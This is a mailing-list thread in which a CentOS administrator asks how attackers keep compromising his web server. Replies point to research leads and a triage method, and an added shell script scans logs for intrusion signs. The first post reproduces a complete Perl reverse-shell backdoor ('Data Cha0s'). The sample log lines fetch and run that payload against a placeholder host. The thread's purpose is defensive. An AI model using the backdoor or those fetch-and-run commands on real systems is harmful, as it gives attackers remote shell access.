I have a personal apache/mail server that is getting hacked and I'm not sure how the person is getting in. What's happening is that every few days, the below script will show up in /tmp as 'dc.txt', owned by apache, and then a TON of mail is queued up to a bunch of addresses in @uol.com.br.

I initially thought they got in because I had an outdated version of 'gallery' installed. I rebuilt the server and updated gallery and thought I should be okay. But now they are still getting in, and instead of blindly rebuilding the server, I need to figure out how they are able to run perl scripts on the server.

Any suggestions?

--Ajay

PS. This is a CentOS 4.2 box running the latest apache/php RPMS.

---------------------------
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
  printf "Usage: $0 [Host] <Port>\n";
  exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
  $port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
  die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
  open(STDIN,">&SERVER");
  open(STDOUT,">&SERVER");
  open(STDERR,">&SERVER");
  exec {'/bin/sh'} '-bash' . "\0" x 4;
  exit(0);
}
print "[*] Datached\n\n";
--------------------------------
A bit of simple Googling should point you in the right direction...

http://vil.nai.com/vil/content/v_129568.htm
http://www.google.co.uk/search?hl=en&q=Data+Cha0s+Connect+Back+Backdoor&btnG=Google+Search&meta

Are you running Twiki open to the internet?

http://siomail.ucsd.edu/pipermail/rvtec-sysadmin/2004-December/000025.html

Will.

On 30/11/05, Ajay Sharma <ssharma at revsharecorp.com> wrote:
> [original message quoted in full]

_______________________________________________
CentOS mailing list
CentOS at centos.org
http://lists.centos.org/mailman/listinfo/centos
Ajay Sharma wrote:
> [original message quoted in full]

I had someone do the same thing on a colocated box I have. Turns out I had an old version of PHPix (also a photo gallery) which someone was able to exploit.

I discovered it by looking at the timestamp of the file(s) in /tmp (or /var/tmp in my case), and the start time for the processes (other than httpd) that were running as the "apache" user. Then, looking at the apache access_log, it was obvious which script was being exploited...

-Greg
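The three-step triage Greg describes (dropped files, stray processes, then the access log) as a shell script. This is an added example, not code from the thread or from CentOS; it assumes the web server runs as user "apache" (the CentOS default), that the access log is in Apache combined format at /var/log/httpd/access_log, and that GNU find and procps ps are available. The log lines in sample_log are constructed for illustration, including the hypothetical script name /gallery/example.php. It goes slightly beyond Greg's description by checking only the request field of each log line, so a "libwww-perl" user agent does not trip the "perl" indicator.

```shell
#!/bin/sh
# Added example, not code from the thread. Turns the three triage steps into
# reusable shell functions. Assumptions (not stated on the page): the web
# server runs as user "apache", the access log is Apache combined format at
# /var/log/httpd/access_log, and GNU find / procps ps are installed.

WEB_USER="${WEB_USER:-apache}"
ACCESS_LOG="${ACCESS_LOG:-/var/log/httpd/access_log}"

# Step 1: files the web-server user left in the scratch directories, newest
# first. Their modification time is the pivot for the next two steps.
dropped_files() {
    find /tmp /var/tmp -user "$WEB_USER" -type f \
        -printf '%TY-%Tm-%Td %TH:%TM  %p\n' 2>/dev/null | sort -r || true
}

# Step 2: processes owned by the web-server user that are not httpd itself,
# with their start time. lstart occupies fields 2-6, so the command name is $7.
foreign_processes() {
    ps -u "$WEB_USER" -o pid=,lstart=,comm=,args= 2>/dev/null | awk '$7 != "httpd"' || true
}

# Step 3: access_log entries whose request line carries a download-and-run
# indicator. Only the quoted request is tested, not the user agent. An optional
# second argument limits the scan to timestamps starting with that prefix,
# e.g. "30/Nov/2005:14" for the hour the file in /tmp appeared.
suspicious_requests() {
    awk -v when="${2:-}" '
        when != "" && index($4, "[" when) != 1 { next }
        {
            req = $0
            sub(/^[^"]*"/, "", req)   # drop everything up to the opening quote
            sub(/".*$/, "", req)      # drop everything from the closing quote on
            if (req ~ /(wget|curl|lynx|fetch|perl|\/tmp\/|%2[fF]tmp|cmd=|dc\.txt)/) print
        }' "$1"
}

# Constructed sample log (not real traffic) so the scan can be exercised offline.
sample_log() {
    cat > "$1" <<'EOF'
10.0.0.5 - - [30/Nov/2005:09:12:44 -0800] "GET /gallery/index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
10.0.0.5 - - [30/Nov/2005:09:12:45 -0800] "GET /gallery/images/logo.gif HTTP/1.1" 200 412 "-" "Mozilla/5.0"
192.0.2.77 - - [30/Nov/2005:14:05:01 -0800] "GET /gallery/example.php?cmd=cd%20/tmp;wget%20http://198.51.100.9/dc.txt HTTP/1.0" 200 17 "-" "libwww-perl/5.79"
192.0.2.77 - - [30/Nov/2005:14:05:03 -0800] "GET /gallery/example.php?cmd=perl%20/tmp/dc.txt%20198.51.100.9%204444 HTTP/1.0" 200 17 "-" "libwww-perl/5.79"
203.0.113.4 - - [30/Nov/2005:16:40:10 -0800] "POST /webmail/login.php HTTP/1.1" 302 0 "-" "Mozilla/4.0"
EOF
}

# "./triage.sh live" runs the real checks; anything else runs the offline demo.
if [ "${1:-}" = "live" ]; then
    echo "== files owned by $WEB_USER in /tmp and /var/tmp =="; dropped_files
    echo "== non-httpd processes running as $WEB_USER =="; foreign_processes
    echo "== suspicious requests in $ACCESS_LOG =="; suspicious_requests "$ACCESS_LOG"
else
    demo=$(mktemp); sample_log "$demo"
    suspicious_requests "$demo" '30/Nov/2005:14'
    rm -f "$demo"
fi
```

On the constructed log the demo prints the two 14:05 requests and nothing else; the 16:40 POST and the "libwww-perl" user agents on their own are not enough to match. In a real case, take the timestamp from dropped_files, pass its hour as the prefix, and the script being abused is usually the only one left in the output.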